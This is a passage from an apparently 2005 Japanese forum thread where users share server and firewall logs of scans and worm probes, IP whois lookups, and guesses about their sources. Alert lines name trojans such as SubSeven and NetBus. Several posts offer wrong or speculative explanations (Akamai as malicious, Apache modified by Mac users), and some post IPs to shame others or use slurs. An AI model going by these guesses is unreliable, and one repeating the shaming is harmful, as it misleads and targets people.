2005/07/11(16:11:06) W-SV static81-223-147-194.xdsl-line.inode.at(81.223.147.194) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/11(20:27:52) W-SV nttkyo211120.tkyo.nt.ftth.ppp.infoweb.ne.jp(220.146.170.120) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/12(01:53:54) W-SV 211.99.184.53 [80] 400 0 "GET http//member.yam.com/yamqq/update.php HTTP/1.1" ( dummy )
316 :
名無しさん@お腹いっぱい。 :2005/07/12(火) 09:38:22
IPアドレス 210.251.43.232 ホスト名 G043232.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 鳥取県 市外局番 -- 接続回線 xDSL
317 :
名無しさん@お腹いっぱい。 :2005/07/12(火) 12:07:02
IPアドレス 60.33.115.124 ホスト名 p3124-ipbf05koufu.yamanashi.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 山梨県 市外局番 -- 接続回線 光
>>315 agent名とかrefererはログとってないの?
>>315 ってBJD鯖?logがそれっぽい。
最近のこれ、apacheのlogがこればっかりで、
bai.ne.jpからは異常な数来るよ。
臨時に全然違うIPなら全然来なくなったから、
やっぱり何か飼ってるんじゃない。
逆にポートスキャンしてみたけど分からなかった。
>>318 >>319 そそー、BJD鯖。
んで、index.cgi作ってあって環境変数をログ取ってあったんだけど、
ユーザエージェントは空っぽ、リファも空っぽになってる。
1年くらい前はWindows 98でIE6っぽいのが多かった気がする。
>>320 コード302って別ベージ転送だよね。そういう設定にしてんのかな?
うちにも/狙いのはくるけど、割合的には少ない。
最近はawstatsが多く、後はWebDAVのやつとかdefault.idaとかsumthinとか、
数は減ったけどすごくうざいtoo longなリクエスト送ってくるやつとか(Redなんとかっていったっけ?)。
でも確かに/のはuseragentもrefererもemptyだね。
以下はgrepして抜き出したやつ。
61.190.76.82 - - [06/Jul/2005:20:44:55 +0900] "GET / HTTP/1.0" 403 260 "-" "-"
61.190.16.138 - - [07/Jul/2005:06:18:21 +0900] "GET / HTTP/1.0" 403 260 "-" "-"
pl249.nas921.nagasaki.nttpc.ne.jp - - [07/Jul/2005:11:09:31 +0900] "GET / HTTP/1
.0" 403 260 "-" "-"
61.152.255.69 - - [07/Jul/2005:14:40:27 +0900] "GET / HTTP/1.0" 403 260 "-" "-"
200.198.144.182 - - [08/Jul/2005:08:35:29 +0900] "GET / HTTP/1.1" 403 272 "-" "M
ozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
nat-ext-02.cc9.ne.jp - - [08/Jul/2005:18:45:30 +0900] "GET / HTTP/1.0" 403 260 "
-" "InternetLinkAgent/3.1"
61.47.145.94 - - [09/Jul/2005:15:36:36 +0900] "GET / HTTP/1.0" 403 260 "-" "-"
61.190.76.31 - - [09/Jul/2005:17:32:07 +0900] "GET / HTTP/1.0" 408 - "-" "-"
61.190.76.18 - - [10/Jul/2005:19:29:44 +0900] "GET / HTTP/1.0" 408 - "-" "-"
61.152.255.69 - - [10/Jul/2005:21:34:29 +0900] "GET / HTTP/1.0" 403 260 "-" "-"
322 :
名無しさん@お腹いっぱい。 :2005/07/13(水) 19:32:43
IPアドレス 210.251.51.45 ホスト名 G051045.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 山形県 市外局番 -- 接続回線 xDSL
IPアドレス 61.192.11.79 ホスト名 zaq3dc00b4f.zaq.ne.jp 都道府県 大阪府 接続回線 CATV ホスト部分は変わるんだけど、何年はり付いてんだよコイツ
同一と思ってるアホ発見!
>>324 これなんだけど教えてくれよコテ君よw
[05/07/13 Wed 13:06.44] zaq3dc00b4f.zaq.ne.jp [61.192.11.79] "GET / HTTP/1.0" 200 15394 "-" "-"
[05/07/13 Wed 14:21.27] zaq3dc00b4f.zaq.ne.jp [61.192.11.79] "GET / HTTP/1.0" 200 15394 "-" "-"
[05/07/13 Wed 16:53.10] zaq3dc00b4f.zaq.ne.jp [61.192.11.79] "GET / HTTP/1.0" 403 198 "-" "-"
[05/07/13 Wed 19:48.30] zaq3dc05073.zaq.ne.jp [61.192.80.115] "GET / HTTP/1.0" 403 198 "-" "-"
[05/07/13 Wed 19:53.05] zaq3dc0331b.zaq.ne.jp [61.192.51.27] "GET / HTTP/1.0" 403 198 "-" "-"
[05/07/13 Wed 20:16.36] zaq3dc00b4f.zaq.ne.jp [61.192.11.79] "GET / HTTP/1.0" 403 198 "-" "-"
[05/07/13 Wed 21:13.48] zaq3dc0331b.zaq.ne.jp [61.192.51.27] "GET / HTTP/1.0" 403 198 "-" "-"
[05/07/13 Wed 21:31.38] zaq3dc03412.zaq.ne.jp [61.192.52.18] "GET / HTTP/1.0" 403 198 "-" "-"
[05/07/13 Wed 21:34.04] zaq3dc03182.zaq.ne.jp [61.192.49.130] "GET / HTTP/1.0" 403 198 "-" "-"
[05/07/13 Wed 21:36.05] zaq3dc0331b.zaq.ne.jp [61.192.51.27] "GET / HTTP/1.0" 403 198 "-" "-"
[05/07/13 Wed 22:06.48] zaq3dc03412.zaq.ne.jp [61.192.52.18] "GET / HTTP/1.0" 403 198 "-" "-"
327 :
名無しさん@お腹いっぱい。 :2005/07/13(水) 22:22:08
晒しage
328 :
名無しさん@お腹いっぱい。 :2005/07/13(水) 23:34:27
ポートスキャン今日だけで同じ奴から1000回以上きてるよ
329 :
326 :2005/07/13(水) 23:37:08
まだまだ来てるよ。こんな調子で毎日なんだよな。 意味がわかんね。 これで全部別人なのか。ほー。 [05/07/13 Wed 22:06.48] zaq3dc03412.zaq.ne.jp [61.192.52.18] "GET / HTTP/1.0" 403 198 "-" "-" [05/07/13 Wed 22:16.57] zaq3dc00b4f.zaq.ne.jp [61.192.11.79] "GET / HTTP/1.0" 403 198 "-" "-" [05/07/13 Wed 22:31.21] zaq3dc00b4f.zaq.ne.jp [61.192.11.79] "GET / HTTP/1.0" 403 198 "-" "-" [05/07/13 Wed 22:48.08] zaq3dc03412.zaq.ne.jp [61.192.52.18] "GET / HTTP/1.0" 403 198 "-" "-" [05/07/13 Wed 22:53.46] zaq3dc03412.zaq.ne.jp [61.192.52.18] "GET / HTTP/1.0" 403 198 "-" "-" [05/07/13 Wed 22:56.49] zaq3dc05344.zaq.ne.jp [61.192.83.68] "GET / HTTP/1.0" 403 198 "-" "-"
>>329 CATV系だと頻繁にIPが変わらないから、見た感じだと3人だと思うよ。
たぶん、あなたのIPが[61.192.*.*]なんじゃないかな?
うちでは、IPが[211.125.*.*]だから、[bai.ne.jp],[mctv.ne.jp],[kct.ne.jp]から
1日に多い時で100〜200回くらい来るよ。
そこでIPを[61.122.*.*]に変更したらほとんど全然来なくなったから、
応急処置として、IPを全然違うIPに変えられるならそれの方が早いかも。
以前、別件でkct.ne.jp側に調査してもらった時は、ユーザーが意識して
やってる訳じゃなく、ユーザーのPCでワームを飼ってたようです。
向こうで現地訪問して対策してもらってから減ったけど、
最近のは調べてないので詳細は不明です。酷くなるなら調査依頼してみます。
参考にならずにゴメン。
ワーム飼ってて気づかない人って多いよね。 でも相手が個人じゃぁ(ISPでないと特定できないから)迷惑でしかないし、改善も期待できん。 特殊なパケットならISPの中で遮断する方法もなくはないと思うけど、 ありふれたパケットだと... でもこのスラ宛のはどんなワームなのかが気になる。特徴がないから検索もできん。
332 :
名無しさん@お腹いっぱい。 :2005/07/14(木) 08:02:03
211.214.160.120 でないなぁ匿名性高いの使ってんの?wwwwwwwwwwwwww
334 :
名無しさん@お腹いっぱい。 :2005/07/14(木) 08:31:21
>>333 KRってなんですか?
9回攻撃してきてますw
防御できてるのかわからないけど、まいいや、
終わってるしこれww
335 :
名無しさん@お腹いっぱい。 :2005/07/14(木) 08:33:39
韓国ですか〜 韓国人に見られてるのか〜まぁ確かになwww でないのは、IPからわかる情報です〜www
66.160.191.67 dedicated67.thehideout.net ↑このホストが定期的にポート1027を叩きに来てるんだが…一体なんだろ。 文字列を含むURLで検索してみると、denyリストによく登録されてるようなんだが
あとこれも。 どっちもport4899にものすげー頻度だわさ。 IPアドレス 61.134.127.2 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) ----------------------------------- IPアドレス 211.228.94.203 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) ---------------------------------- これはport1433に。 IPアドレス 219.238.172.99 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN)
>>334 ほい。
inetnum: 211.212.0.0 - 211.215.255.255
netname: HANANET
descr: Hanaro Telecom, Inc.
country: KR
admin-c: IS37-AP
tech-c: SH243-AP
remarks: ***********************************************
remarks: KRNIC of NIDA is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the NIDA Whois DB
remarks:
http://whois.nida.or.kr/english/index.html remarks: ***********************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed:
[email protected] 20010615
changed:
[email protected] 20010730
status: ALLOCATED PORTABLE
changed:
[email protected] 20041007
source: APNIC
>>321 そう別ページ転送。ダミーはlocalhostに飛ばしてあって本物でもほかのに飛ばしてる。
たまってたのでまた貼り付け・・・。()がないのは本物に来たやつ。例によってリンクはさせてない。
2005/07/12(13:57:17) W-SV ntaich095151.aich.nt.ftth.ppp.infoweb.ne.jp(220.146.207.151) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/12(20:14:19) W-SV 218.83.155.79 [80] 400 0 "GET http//217.106.232.38/default.shtml HTTP/1.1"
2005/07/13(00:08:47) W-SV ntgifu036039.gifu.nt.ftth.ppp.infoweb.ne.jp(220.146.133.39) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/13(07:57:54) W-SV 218.83.155.79 [80] 400 0 "GET http//217.106.232.38/default.shtml HTTP/1.1"
2005/07/13(16:41:23) W-SV 211.99.184.53 [80] 400 0 "GET http//member.yam.com/yamqq/update.php HTTP/1.1" ( dummy )
2005/07/13(18:13:34) W-SV nttkyo211083.tkyo.nt.ftth.ppp.infoweb.ne.jp(220.146.170.83) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/13(19:17:30) W-SV 211.99.184.53 [80] 400 0 "GET http//member.yam.com/yamqq/update.php HTTP/1.1" ( dummy )
2005/07/13(20:57:44) W-SV ntgifu037144.gifu.nt.adsl.ppp.infoweb.ne.jp(220.146.198.144) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/13(21:43:31) W-SV ntgifu037144.gifu.nt.adsl.ppp.infoweb.ne.jp(220.146.198.144) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/13(22:11:56) W-SV ntgifu037144.gifu.nt.adsl.ppp.infoweb.ne.jp(220.146.198.144) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/13(23:09:00) W-SV ntgifu037144.gifu.nt.adsl.ppp.infoweb.ne.jp(220.146.198.144) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/13(23:17:36) W-SV 220.146.121.9 [80] E200030 "リクエストに問題があります。"
2005/07/14(02:28:27) W-SV nttkyo213185.tkyo.nt.ftth.ppp.infoweb.ne.jp(220.146.172.185) [80] 302 29 "GET / HTTP/1.0" ( dummy )
しばらくしてもう一度見たらまた来てる・・・。もうね、アボガド、バナナ 2005/07/14(09:25:08) W-SV user-24-96-154-154.knology.net(24.96.154.154) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/14(09:27:05) W-SV nsfw.newnanutilities.org(66.216.200.2) [80] 302 29 "GET / HTTP/1.0" ( dummy )
>>339-340 なんじゃこりゃ('A`)
中国と韓国は感染者のすくつ(←なぜか変換できない)かよ!
/アタックですが、いくつかあるようです。 MIMAILというDoSワームの亜種かもしれないし、 いくつかのウェブサーバ(anhttpd, thttpd)の古いバージョンへのアタック、 AirStationへのアタック、などがあるとか。
345 :
326 :2005/07/14(木) 10:49:30
>>330 いえいえ、大変参考になりました。仰せのとおり 61.192.x.x (固定IP)です。
最近はWebアプリをつっついてくるのが主流なのに、zaq だけ / へ頻繁にアクセス
してきたから不気味だったですよ。
>>344 なるほど。
>>344 なるほど、情報どうもです。
また来てた。前は機器の電源入れ直すだけで思いっきりIP変わってたのに最近変わらなくなった・・・。
2005/07/14(09:55:58) W-SV ntszok053175.szok.nt.adsl.ppp.infoweb.ne.jp(220.146.193.175) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/14(11:50:58) W-SV 220.230.178.3 [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/07/14(14:06:39) W-SV tkbn112225.catv.ppp.infoweb.ne.jp(220.146.39.225) [80] 302 29 "GET / HTTP/1.0" ( dummy )
347 :
330 :2005/07/14(木) 19:19:00
>>344 情報ありがとです。
元CATV関係者で、あるドメイン管理者として、 / にIPだけで
来るアクセスに付いて、今度調査依頼してみる。
でも、こちらだとbai.ne.jpなので期待できない。
infoweb.ne.jpみたいに返信すらない可能性大ですが・・・
そう言えば、bai.ne.jpとzaq.ne.jpどちらも関西のCATVだな。
なにか関係あるのかな?
"GET / HTTP/1.0" (""も必要)で検索すると多少は情報にありつけるものの、 プロトコルの解説のページが多く引っかかるので根気よく探さないといかんです。 相手のISPは、単に近いとこからが多いということかと。 うちはNTT PCコミュ使っていて61.x.x.xなので、やはりその近くのIPアドレスからが多いです。 anhttpd, thttpd狙いのは特定のヘッダを付けてくるらしいので、 それをログにとれば確認できそうです。 でもまぁうちの場合は問題なさそうなんで放ってます。
補足。 ワームとかDoSとかの用語を別個に追加して検索した方がよさげです。
同じやつが時間開けてアクセスしに来るのがうざ過ぎる。 2005/07/14(17:46:24) W-SV 82.55.226.223 [80] E200033 "サポート外のメソッドです。" 2005/07/14(20:29:41) W-SV 220.75.16.56 [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/14(21:08:20) W-SV tkbn112225.catv.ppp.infoweb.ne.jp(220.146.39.225) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/14(21:36:50) W-SV tkbn112225.catv.ppp.infoweb.ne.jp(220.146.39.225) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/07/15(07:09:53) W-SV ntszok057178.szok.nt.ftth.ppp.infoweb.ne.jp(220.146.197.178) [80] 302 29 "GET / HTTP/1.0" ( dummy )
>>350 もうぼちぼちええんでね? 直接的な対策方法はないし、数も少ないしさ。
どうしてもいやならポートを閉じるしかないべ。
brutesshの発展型によるSSHスキャンに比べればカワイイモんよ。
あれはアクセス可にしておくと、2-3秒間隔ペースで数千回アタックしてくるしね。
Winはようわからんが、ポート80以外は大丈夫なのけ?
352 :
名無しさん@お腹いっぱい。 :2005/07/15(金) 13:15:16
>>350 google.comにリダイレクトさせたら?
354 :
名無しさん@お腹いっぱい。 :2005/07/16(土) 10:25:48
IPアドレス 219.61.142.12 ホスト名 YahooBB219061142012.bbtec.net 割当国 ※ 日本 (JP) 都道府県 和歌山県 市外局番 -- 接続回線 xDSL
IPアドレス 12.158.80.10 ホスト名 crl.verisign.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし uzeee
356 :
名無しさん@お腹いっぱい。 :2005/07/16(土) 21:43:50
番外ですが、 file:///C:/Documents%20and%20Settings/user_name/%83f%83X%83N%83g%... とかいうのが思いっきりリファラーに残っちゃっている人がいますね。 何かほっとしますが、自分ももしかして?と思うと笑ってもいられないような。
357 :
名無しさん@お腹いっぱい。 :2005/07/16(土) 21:56:30
IPアドレス 221.187.205.230 ホスト名 p1230-ipbf12gifu.gifu.ocn.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 岐阜県 市外局番 -- 接続回線 光
>>356 そういうのってエクスプローラのプレビュー表示?
何度かやったことある件w
219.108.32.107 先ほど掲示板荒らされて困ってます。
360 :
匿名 :2005/07/17(日) 13:31:52
秋(218.225.223.77:31496)さんが入室しました 秋(218.225.223.77:31496)さんが入室しました ちゃっとあらすんです・・・
361 :
:2005/07/17(日) 15:53:37
鈴木(222.144.221.68:25861) 鈴木(222.144.221.68:25861)鈴木(222.144.221.68:25861) ぶ━━( ´.ゝ`)━━ん
IPアドレス 61.44.22.55 ホスト名 55.22.44.61.ap.yournet.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 福井県 市外局番 -- 接続回線 種別不明 氏ね
IPアドレス 61.124.15.169 ホスト名 nttksm015169.tksm.nt.ftth.ppp.infoweb.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 徳島県 市外局番 -- 接続回線 光 ポートスキャンウザス
なんでアクセスの種別を書かない人が多いんだろうねぇ。
15日から"GET / HTTP/1.0"が突然と少なくなった。 IPも変えてないのに、1日50件ほど来てたのが今日はまだ無し。 不気味だ。
366 :
名無しさん@お腹いっぱい。 :2005/07/17(日) 20:33:08
ポート3389に来てますね。
367 :
名無しさん@お腹いっぱい。 :2005/07/17(日) 23:05:03
2005/06/29 07:58:13 203.141.36.246:80 (img3.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1806 Musiconline 2005/06/29 07:58:10 202.93.87.249:80 (w01.geo.vip.bbt.yahoo.co.jp) 192.168.1.101:1799 NETRISK 2005/06/29 07:52:51 203.141.36.246:80 (img3.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1713 ConferenceTalk 2005/06/29 07:52:51 203.141.36.246:80 (img3.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1712 resource monitoring service 2005/06/29 07:52:50 203.141.36.246:80 (img3.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1711 pptconference 2005/06/29 07:52:49 203.141.36.246:80 (img3.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1701 l2tp / l2f 2005/06/29 07:49:27 203.141.41.117:80 (imgg02.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1516 Virtual Places Audio data 2005/06/29 07:49:26 203.141.41.117:80 (imgg02.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1500 VLSI License Manager 2005/06/29 07:43:31 203.141.41.117:80 (imgg02.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1369 GlobalView to Unix Shell 2005/06/29 07:43:28 203.141.41.117:80 (imgg02.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1365 Network Software Associates 2005/06/29 07:43:28 203.141.41.117:80 (imgg02.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1362 TimeFlies 2005/06/29 07:43:28 203.141.41.117:80 (imgg02.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1359 FTSRV 2005/06/29 07:43:27 203.141.41.117:80 (imgg02.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1352 Lotus Notes 2005/06/29 07:42:09 202.93.87.249:80 (w01.geo.vip.bbt.yahoo.co.jp) 192.168.1.101:1317 ポート 1317 (TCP) 2005/06/29 07:40:31 203.141.41.117:80 (imgg02.img.vip.bbt.yahoo.co.jp) 192.168.1.101:1243 BackDoor G Trojan / SubSeven Trojan/Apocalypse Trojan
368 :
名無しさん@お腹いっぱい。 :2005/07/18(月) 08:06:53
IPアドレス 202.32.235.39 ホスト名 f30-pc39.cty-net.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 三重県 市外局番 -- 接続回線 CATV
369 :
名無しさん@お腹いっぱい。 :2005/07/18(月) 08:34:10
2005/07/18 08:29:37: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3654 2005/07/18 08:29:37: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3655 2005/07/18 08:29:37: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3654 2005/07/18 08:29:37: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3655 2005/07/18 08:29:37: LAN2 Rejected at IN(default) filter: TCP 211.10.246.161:80 > 169.254.0.2:3651 2005/07/18 08:29:38: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3654 2005/07/18 08:29:38: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3655 2005/07/18 08:29:38: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3654 2005/07/18 08:29:38: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3655 2005/07/18 08:29:39: LAN2 Rejected at IN(default) filter: TCP 211.10.246.161:80 > 169.254.0.2:3651 2005/07/18 08:29:39: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3654 2005/07/18 08:29:39: LAN2 Rejected at IN(default) filter: TCP 211.10.246.139:80 > 169.254.0.2:3655 IPアドレス 211.10.246.139 ホスト名 a211-10-246-139.deploy.akamaitechnologies.com IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
370 :
名無しさん@お腹いっぱい。 :2005/07/18(月) 09:06:06
>>369 akamaitechnologies.comは悪のすくつだからoutgoingもブロックしとくといいよ。
2ch馬鹿は止めろよ。すくつとかがいしゅつとか。マジ馬鹿が増える。 念のため書いとくが、そうくつにきしゅつ。
ふいんきでわかるでしょ しわわせになろう
クラックされて踏み台にされてる奴らとかわらんな。
>>371 あえてそっちに突っ込むキミは生粋の2ch馬鹿。www
210.248.158.218(cyberwave.jp)からSSHスキャンされちゃったよ。
>>375 失礼。間違いだった。
SSHスキャンされたのは 210.166.208.188 から。
でもブラウザのURLに入れるとcyberwave.jpに転送される。
IPアドレス 220.49.33.51 ホスト名 YahooBB220049033051.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 山口県 市外局番 -- 接続回線 xDSL
IPアドレス 219.122.9.140 ホスト名 anchovy.o-net.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
Whoisだけ貼る厨うざすぎ。 どういうアタック受けてるか位書け。 自分がどういう攻撃を受けたか判らない奴はすっこんどれ。 ちなみにオレは某所からPing of Death。あぁうっとうしい。
382 :
名無しさん@お腹いっぱい。 :2005/07/19(火) 14:29:54
IPアドレス 210.251.200.239 ホスト名 CATV-210-251-200-239.medias.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛知県 市外局番 -- 接続回線 CATV
210.192.101.194 awstatセキュリティホール攻め。 /stats /awstats.pl /cgi
詳細: このコンピュータから試みた侵入「BD NetBus Pro 2.0」の対象は 211.125.103.59 を検出して遮断しました。 IPアドレス 211.125.103.59 ホスト名 m059.nc1.kct.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 岡山県 市外局番 -- 接続回線 CATV
どうせポートスキャンかシンフラッドだろ ひとつ貼られるたびに聞くのもウザイよ
ポートスキャン先のポートが、たまたまNetbusだけのような気がする。 相手のIPのPCがボットになっていて、そこからNetbusサーバーを探してるのかも知れない。
↑ × Netbusだけ ○ Netbusだっただけ (シツレー)
/アタックは無視することにしたら↓が残った。 2005/07/20(01:35:19) W-SV 61.191.108.133 [80] 400 0 "GET http//cn.yahoo.com/ HTTP/1.1" ( dummy ) 串として試そうとしたって事?
390 :
名無しさん@お腹いっぱい。 :2005/07/20(水) 11:57:33
IPアドレス 210.251.35.72 ホスト名 G035072.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 福岡県 市外局番 -- 接続回線 種別不明
393 :
名無しさん@お腹いっぱい。 :2005/07/20(水) 13:51:25
211.235.40.198 チョン 木馬
394 :
名無しさん@お腹いっぱい。 :2005/07/20(水) 17:09:41
206.204.51.131 どういうことなんですか?
396 :
名無しさん@お腹いっぱい。 :2005/07/20(水) 17:34:52
>395 ノートンを試用期間で使ってますがportscanされただけみたいです。 IPはsymantecみたいだしこういう仕様なんですかね? 意味が分からんとです。
200.31.69.186 <チラシの裏> cacti のセキュリティホール攻め。古っと思ったら、そうでもなかった。 まあ、関係ないんだけど。 WebApp.plってのは何だろ? </チラシの裏>
2005/07/20 08:58:10SCAN-FIN 4.11.69.186 4 2005/07/20 08:33:13SCAN-FIN 219.94.57.1442 2005/07/20 07:26:30SCAN-FIN 61.200.100.902 2005/07/20 07:03:52SCAN-FIN 24.84.170.2184 2005/07/20 06:33:04SCAN-FIN 219.165.252.824 2005/07/19 18:50:21Netbus/GabanBus 220.76.133.2533
4.2 1.2キロ 7800
YahooBB219208026001.bbtec.net
IPアドレス 218.220.12.22 ホスト名 zaqdadc0c16.zaq.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 大阪府 市外局番 -- 接続回線 CATV ポートスキャンうぜえ
ルータ使ってない人って多いの? もちろんルータのファイアウォール機能を使うということだけど。
詳細なログが摂れない家庭用のルーター使ってる人は このスレには少ないと思う
最近無線インターネッツが増えててさ、ご近所さんもポコスカ無線でネッツしてんのさ。 で、オレの自宅はずっと昔から無線ネッツでやってて、感度悪い時があったので外部アンテナを立ててたのさ。 まぁオレのマシンからご近所さんのLANが見える事見える事。暗号化してるのは正解なんだけど、してない所もあるんよ。 「暗号化して不正アクセスされないようにしたら?」と言うべきか?
スレ違いだと思うから言わなくていいよ
2005/07/21(10:15:01) W-SV 209.125.253.226 [80] 404 0 "HEAD /dfind.apache HTTP/1.1" こんなのがきた。
407 :
名無しさん@お腹いっぱい。 :2005/07/21(木) 13:10:54
IPアドレス 210.251.59.197 ホスト名 G059197.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛知県 市外局番 -- 接続回線 種別不明
すいません、質問なのですが、下記のIPのように 右の3つの数字だけ違う理由は何が考えられるのでしょうか? よろしければ教えて下さいm(__)m 211.2.124.136 211.2.124.805 211.2.124.592
411 :
名無しさん@お腹いっぱい。 :2005/07/21(木) 15:47:15
>>410 返答ありがとうございますm(__)m
それで今、コレ↓に困っているのですがこれは偽装というやつなのでしょうか?
連続で質問してすいません。
221.21.68.203
221.21.68.57
413 :
名無しさん@お腹いっぱい。 :2005/07/21(木) 17:04:51
>>412 返答ありがとうございます。
いえてっきり同じ人からだと思ったので
>>409 のように変更出きるのかな?、と思ったのですが
>>409 が無理なら
>>411 のIPアドって同じ人からでは無いのかな?、と思いまして。
これ↓が同じ人からなのか知りたかったので…。すいません。
221.21.68.203
221.21.68.57
414 :
名無しさん@お腹いっぱい。 :2005/07/21(木) 17:09:15
横入りスマソ 今2001年という古いあいのりの板で 「ふしあなトラップ」とかいうものを踏んでしまったんですが 大丈夫ですか? IPさらされてしまうのでしょうか・・・
>>413 同じ人かもしれないし、同じ人じゃないかもしれないけど、
(接続し直せばIPアドレスがかわるISPが多いから)
ウイルスやワームが自らの近くのIPからアタックするようにプログラムされてるものが多いから、
結果的に自分(あなた)のIPの近くから来ることが多いよ。
>>415 丁寧なご返答ありがとうございます!
とりあえず気をつけるようにいたします。
ソフバからって、ヤホーBBにルーターつけてない人(付けてる方が珍しい)からファイル共有の
ポートにアクセスしてるだけだと思う。
ネットマスクが 255.255.255.0 のせい。
予想では、
>>411 は ヤッホーBBユーザー
「フレッツ光プレミアム」ではじめて、ルータが必須(提供される)になるんでしたっけ? 同じNTTのFTTHでも「Bフレッツ」はルータ必須じゃない。 ようやく、という感じですが、無意識の加害者が減ってくれることを祈りたいです。
>>419 ルータでも、アウトバウンドはスルーだから意味が無い。
>>420 デフォで137-139、445はアウトもカット
>>420 あぁそうか。現状では外向きはスルーがデフォルトのがほとんどだから
無意識の加害者は減らないか。うーむ。
デフォルトでもアウトバウンドのNetBIOSを防いでくれる。 ルーターのログを見ると、インバウンドのNetBIOSが数分おきに来てるから、ルーターを付けて もらうだけでネットの負荷が下がるはず。
>>408 Win鯖(BJD)だけど?
awstats.plと/cgi-bin/openwebmail/userstat.plとか調べに来てるのがいた。
210.192.100.212
425 :
408 :2005/07/22(金) 15:14:20
>>424 うーん。。。
じゃあ、多分マカに狙われてる可能性も有るな。
マカで自鯖やってる人の一部は
>>406 に出てたApacheを使ってる。
鯖ソフトApacheの説明書の一部
>オープンソースの動きから生まれた珠玉のソフトウェアの 1 つである
>Apache は、だれもが独占できないという意味で無償で提供されています。
>基本的に、プログラマーには、入手したソースコードに必要と思われる変更
>を加える自由が与えられています ― ただし、このような自由が与えられる
>のは、ほかのプログラマーにも彼らが入手したソースコードに変更を加える
>同様の権利を認める場合に限られます。
これを利用して不正アクセスするプログラムに改造したんじゃないかな。
んで、Apacheを踏み台にするとか。
ApacheはWin用も有るけどMacには最初から入ってるらしい。 だから、マカの率が少しだけ高い。(というトーシロ推測) でも、シェアから言ったらWintが逆転だけど、、、 だ が 、 し か し Apacheだけの率で探ると犯人はお前だ。→ (マカ) <エッッッ ってことになる。 (多分いろんな面で間違っている。orz)
>>425 そうなのか・・・。
相変わらず/アタック多い。
IP変えてみたら今度は同ISPからは来なくなった。ホスト名解決できないところから来てる。(調べるのマンドクセ
>>425-426 意味が分からん。
"HEAD /dfind.apache HTTP/1.1" なんてただのリクエストっしょ。
何かを狙ってきてはいても、相手が何者かは判別できない。
dfindというのはハッキングツール。 推測だが、dfindに感染しているホストを探していると思われる。 影響を受ける(dfindに感染する)のはWindows系のみ。 ちなみにApacheはUNIX系ではデファクト。Winでも使われる。
>>424 それ有名すぎるんですが・・・
探しものですよ。
俺もLinuxとFreeBSDでapache。それが普通。
というよりWinもMacも使ってない。
今までawなんたらのはよく見たけどopenwebmailも一緒なのは初めてだったから
2005/07/22 22:44:37EvilFTP access 220.4.151.33 1 2005/07/22 21:11:29EvilFTP access 219.162.66.141 2 2005/07/22 20:48:27EvilFTP access 218.142.133.43 2 2005/07/22 20:41:09EvilFTP access 219.23.192.54 2
433 :
名無しさん@お腹いっぱい。 :2005/07/22(金) 23:30:25
